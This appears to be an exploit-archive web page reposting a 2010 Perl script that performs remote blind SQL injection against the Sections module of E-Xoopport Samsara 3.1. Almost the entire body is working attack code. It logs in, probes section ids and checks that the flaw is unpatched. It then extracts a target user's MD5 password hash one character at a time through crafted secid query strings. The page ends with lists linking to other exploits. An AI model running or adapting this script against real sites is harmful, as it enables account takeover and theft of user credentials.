首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploi
来源:www.warwolfz.org 作者:Dante90 发布时间:2010-09-15  

#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara <= v3.1 (Sections Module 2) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_ & Dante90, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Web Site: www.warwolfz.org

use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;

$^O eq 'MSWin32' ? system('cls') : system('clear');

print "
E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (Sections Module) |
| Author/s: _mRkZ_ & Dante90, WaRWolFz Crew         |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
";

if (@ARGV != 4) {
 print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";
 exit;
}

$host    = $ARGV[0];
$usr     = $ARGV[1];
$pwd     = $ARGV[2];
$anickde = $ARGV[3];
$anick   = '0x'.EncHex($anickde);

print "[+] Logging In...\r\n";
my %postdata = (
 uname => "$usr",
 pass => "$pwd"
);
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req  = (POST $host, \%postdata);
my $cookies = HTTP::Cookies->new();
$request = $ua->request($req);
$ua->cookie_jar($cookies);
$content = $request->content;
if ($content =~ /<head><meta http-equiv="Refresh" content="0; URL=modules\/news\/" \/><\/head>/i) {
 print "[+] Logged in\r\n";
} else {
 print "[-] Fatal Error: username/password incorrect?\r\n";
 exit;
}

print "[!] Retriving section id...\r\n";
$idi = 0;
while ($idi != 11) {
 $idi++;
 $ua = LWP::UserAgent->new;
 $ua->agent("Mozilla 5.0");
 my $req  = $host."/modules/sections/index.php?op=listarticles&secid=$idi";
 $request = $ua->get($req);
 $ua->cookie_jar($cookies);
 $content = $request->content;
 if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
  $secid = $idi;
  last;
 }
}

if(!defined $secid) {
 print "[-] Fatal Error: Section id not found!\r\n";
 exit;
} else {
 print "[+] Section id '$secid' retrieved\r\n";
}

print "[!] Checking path...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req  = $host."/modules/sections/index.php?op=listarticles&secid=$secid";
$request = $ua->get($req);
$ua->cookie_jar($cookies);
$content = $request->content;
if ($content =~ /Ecco i documenti della sezione/i) {
 print "[+] Correct Path\r\n";
} else {
 print "[-] Fatal Error: Wrong Path\r\n";
 exit;
}

print "[!] Checking if vulnerability has been fixed...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req  = $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+1=1";
$request = $ua->get($req);
$ua->cookie_jar($cookies);
$content = $request->content;
if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
 print "[+] Vulnerability has not been fixed...\r\n";
} else {
 print "[-] Fatal Error: Vulnerability has been fixed\r\n";
 open LOGG, ">log.html";
 print LOGG $content;
 close LOGG;
 exit;
}

print "[!] Checking nick to hack...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
my $req  = $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),32,1))>0";
$request = $ua->get($req);
$ua->cookie_jar($cookies);
$content = $request->content;
if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
 print "[+] Nick exists...\r\n";
} else {
 print "[-] Fatal Error: Nick does not exists\r\n";
 exit;
}

print "[!] Exploiting...\r\n";
my $i = 1;
while ($i != 33) {
 my $wn = 47;
 while (1) {
  $wn++;
  $ua = LWP::UserAgent->new;
  $ua->agent("Mozilla 5.0");
  my $req  = $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
  $request = $ua->get($req);
  $ua->cookie_jar($cookies);
  $content = $request->content;
  if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) {
   $pwdchr .= chr($wn);
   $^O eq 'MSWin32' ? system('cls') : system('clear');
   PrintChars($anickde, $pwdchr, $secid);
   last;
  }
 }
 $i++;
}

print "\r\n[+] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.net\r\n\r\n";

sub PrintChars {
$anick1 = $_[0];
$chars = $_[1];
$secid = $_[2];
print "
E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit
+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (Sections Module) |
| Author/s: _mRkZ_ & Dante90, WaRWolFz Crew         |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
[+] Logging In...
[+] Logged in
[!] Retriving section id...
[+] Section id '$secid' retrived
[!] Checking path...
[+] Correct Path
[!] Checking if vulnerability has been fixed...
[+] Vulnerability has not been fixed...
[!] Checking nick to hack...
[+] Nick exists...
[!] Exploiting...
[+] ".$anick1."'s md5 Password: $chars
";
}

sub EncHex {
 $char = $_[0];
 chomp $char;
 @trans = unpack("H*", "$char");
 return $trans[0];
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Novell iPrint Client Browser P
·IBM Lotus Domino iCalendar Ema
·RogiShip Explorer [browser] 1.
·NCP Secure Client - Juniper Ed
·UCenter Home 2.0 SQL Injection
·NCP Secure Entry Client v.9.23
·RealPlayer FLV Parsing Integer
·plano mostracategoria (id) Rem
·AA SMTP SERVER v.1.1 - Crash P
·win32/xp sp3 (Tr) MessageBoxA
·Kingsoft Antivirus <= 2010.04.
·Ipswitch Imail Server List Mai
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved